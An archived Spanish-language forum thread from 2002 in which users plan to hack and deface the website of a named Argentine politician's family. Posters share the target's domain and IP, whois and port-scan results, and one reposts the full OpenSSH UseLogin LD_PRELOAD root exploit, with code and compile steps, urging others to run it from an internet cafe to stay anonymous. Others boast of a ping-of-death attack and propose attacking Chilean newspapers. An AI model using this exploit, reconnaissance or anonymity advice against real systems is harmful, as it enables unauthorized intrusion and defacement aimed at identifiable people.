PDA

Ver la versión completa : hackiar una web .....



networking
17-02-2002, 16:54
algien me dice komo puedo hackiar una web koncegi 10 bug de phpnuke y ninguno funka kiero darle masa a paginas pornografikas o de politikos ya ke aka en argentina se estan portando mal


wue al ke me me kiera ayudar .... se lo agradecere






:D salu2

tigger
20-02-2002, 17:01
Hola Amigo, yo te ayudaré en lo que puedas, ya que soy Argentino y eso de los políticos tampoco me va, no soy un gran hackeador de web's, de hecho solo hackee una con php Nuke con la ayuda de Crackzme ;) y tiré un server con el ping de la muerte :eek: pero con todo gusto trataré de ayudarte :D

Salu2

<MoRPHeuS>
24-02-2002, 08:39
Cuenten conmigo!;)
UIN:150093425

black_hawk
24-02-2002, 22:32
Mira pon las direcciones de las page porno y aqui sacamos las debilidades que tengan para ayudarnos entre todos

marcos ariel
26-02-2002, 00:10
bueno me gustaria saber bien como puedo hacer para aser eso con las paginas muchas gracias nahuelito.....:rolleyes:

[NeCkRo]
26-02-2002, 00:47
bueno agradesko a todos por apoyarme y en kuanto kieran nos enkontramso en cq o msn y empesamos la aktividad anti wue de porno infantil o politika jejeje .... a tigger me decis komo la hackiaste ¡ping de la muerte jeje komo men ?? :D




! viva argentina ¡ todoZz X un mundo mejor

marcos ariel
01-03-2002, 00:26
bueno esta es una pagina de un politico que vive serca de mi casa.. es un terrible ladron y ahora anda todo agrandado porque gracias a la plata que nos roba al pueblo tiene su propia pagina web referida a su nieta que nacio me gustaria saber si se le puede hacer algo a su pagina de la cual esta tan orgulloso jejejeje muchas gracias y espero que me hallan entendido.. es un politico de esos que tirarron a la mierda mi pais (argentina):rolleyes:

marcos ariel
01-03-2002, 00:29
:p www.bebesartori.com

marcos ariel
01-03-2002, 00:40
;) www.bebesartori.com.ar es la verdadera dire jejeje

black_hawk
02-03-2002, 02:54
Va a estar dificil esta algo protegida la page



www.bebesartori.com.ar :


208.185.127.162 :


www.aboutwebservices.com

[NeCkRo]
03-03-2002, 04:58
protegida komo sabez la exploraste me gustaria hackiarla juntos ya ke somos los doz de argentina .... lastima ke yo soy de buenos aires capital y vos sos de las probincias pero eso no inporta kontaktame y nos unimos icq 126836730 mail neckrotheking@hotmail.com nozz bemoXXXXX

enrich
09-03-2002, 02:06
yo tb necesito saber como hackear una web me portare

marcos ariel
09-03-2002, 02:28
[NeCkRo] me gustaria saber si estas en el messenger de hotmail ya que no trabajo con el icq no me gusta si es asi contactame mi dire es marcosariel2001@hotmail.com asi nos ponemos deacuerdo con este hijo demil puta y los que quieran contribuir esta todo bien esta es la familia de este hijo mil puta que nos quita el trabajo y nos roba y gracias a el la argentina esta como esta hecha mieerda contribuyan que es una causa noble...... :cool: :mad: :mad: :mad: :mad: :mad: :mad:

marcos ariel
09-03-2002, 02:31
www.bebesartori.com.ar la pagina de ese hijo deputa

tarod
13-03-2002, 17:11
Señores yo soy un principiante en estos campos pero le hice un whois a la dir que proporcionais y el resulatado es el siguiente:
Query: 208.185.127.162
Registry: whois.arin.net
Results:
Abovenet Communications, Inc. (NETBLK-ABOVENET-6)
50 W. San Fernando St., Suite 1010
San Jose, CA 95113
US

Netname: ABOVENET-6
Netblock: 208.184.0.0 - 208.185.255.255
Maintainer: ABVE

Coordinator:
Metromedia Fiber Networks/AboveNet (NOC41-ORG-ARIN) noc@ABOVE.NET
408-367-6666
Fax- 408-367-6688

Domain System inverse mapping provided by:

NS.ABOVE.NET 207.126.96.162
NS3.ABOVE.NET 207.126.105.146

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

Record last updated on 27-Apr-2001.
Database last updated on 12-Mar-2002 19:58:03 EDT.


Results brought to you by the GeekTools WHOIS Proxy
Server results may be copyrighted and are used with permission.
Your host (205.219.188.15) has visited 2 times today.

Esto lo hice porque a la dir que teneis no era capaz de pasarle un scan entonces decidi hacerle un scan a la segunda ip que aparece en el whois aky si doy resultado y aparecido un dato y es que el puerto 22 esta abierto, este puerto es el de Remote login Protocol.
No se como seguir espero que esta info sirva para lago y si es asi me lo expliqueis un poko.
Saludoxxxxxxxxxxxx

Achilipu
13-03-2002, 22:52
Tarod podrias explicar como le hiciste un whois, yo tb soy newbie y quiero aprender. Gracias anticipadas. Aupa a ver si entre todos hacemos algo...;)

tarod
14-03-2002, 10:36
Buenola cosa es facil tienes dos opcionos ,por lo menos que yo sepa, 1 tienes linux/unix y haces un whois ip o te conectas a una de las muchas web que te dan este servicio yo lo hice en http://www.icehousedesigns.com/tools/
No se si servira para algo la info que obtube con el whois y el scaneo a esta segunda direccion si alguin sabe mas que nos eche un cable.
Saludox





El hombre es un lobo para el hombre y un hijo puta para el lobo

marcos ariel
19-03-2002, 18:04
saben que esa pagina me esta dando mas de un dolor de cabeza sera posible que alguna persona que sepa bastante me diga si se puede o no cagarle la pagina a este hijo de mil puta porque yo nops gracias...

juanaca
22-03-2002, 17:03
Hola.


apoyo tu causa viejo.

en nombre del pueblo chileno, que sin duda está por seguir el lamentable camino del hermano pueblo argentino. Por acá tenemos algunos periódicos del grupo El Mercurio que están pidiendo a gritos que se los caguen. De manera que seguiré atentamente las instrucciones de ALGUN EXPERTO EN LA MATERIA QUE AYUDE EN ESTA NOBLE CAUSA.

;) SUERTE.

marcos ariel
23-03-2002, 00:17
y hablando en serio prece que ests personas que se dedican a robar y a robar no entienden qu tambien hay gente con hambre.. niños con frio.. gente que no tiene que ponerse mietras ellos disfrutan los millones de dolares que se roban y todabia tienen la osadia de mostrarla publicamente por las calles con su 4x4 o sus casas que parecen castillos

tarod
27-03-2002, 13:30
Bueno aunque nadie parece seguir trabajando en este tema yo sigo intentando obtener el acceso al servidor.
Recapitulando un poko le hicimos un whois a la famos pagina y vimos que teniamos dos servidores detras que tenian el puerto 22 abierto este puerto es el de remote login protocol hice mis indagaciones y tiene la version 1.99 que es bastante antigua, creo que se habla de 2.4 o 3.4 en la actualidad. Encontre un exploit que nos permite acceso de root en el servidor para una version superior por lo que cabe la posibilidad de que funcione con esta version pero como ahora mismo no tengo compilador ni linux instalado no lo he podido compilar ni ejecutar pero lo voy a postear para que alguien lo compile y si puede lo pruebe desde algun cyber.


--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <war@genhex.org> / http://www.genhex.org


--[ Intro ]--

I was very curious in finding out how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.

This is based on libroot from squidge@onyx.infonexus.com,
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).

Kudos to pmsac@toxyn.org for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
the seteuid(0) (it originally was a system("/bin/sh");).


--[ Code ]--

Create a lib.c file with the next content:

---8<---
#include <stdio.h>
int setuid(int uid){
printf("setuid() called...\n");
seteuid(0);
}
---8<---

Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so


Now, for the tricky (*g*) part...

You must have an account on the machine, and create an entry
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

environment="LD_PRELOAD=<your home>/libroot.so" <your public key>

When sshd receives your connection, it will export this variable
into the environment *BEFORE* running login. Somewhere after this,
it executes a setuid. When it does, it makes a seteuid(0).

$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)


It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can setup the enviroment, and login.
And obviously (duh) it must have UseLogin enabled.

That's all.


shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.


-- [WaR]
"If you can't hack it, hit it with a hammer"

Espero que esto sirva de algo y que a su vez alguien pueda ilustrarno con los resultados obtenidos.

eXcalibur
27-03-2002, 14:08
Señores, mucho ojo con webs de este calibre pues pueden ir a la carcel, nuca intenten hacer nada con su IP

tarod
27-03-2002, 14:27
Yo solo estoy dando ideas no se ni si son las correctas pero desde luego con mi ip no intentaria nada por eso sugeri lo del cyber es un sitio donde eres anonimo tb estan las aulas de las uni pero hay la conexion suele ser una patata si hay alguien que sepa mas que yo (cosa bastante probable) cree que este es el camino para asaltar la web?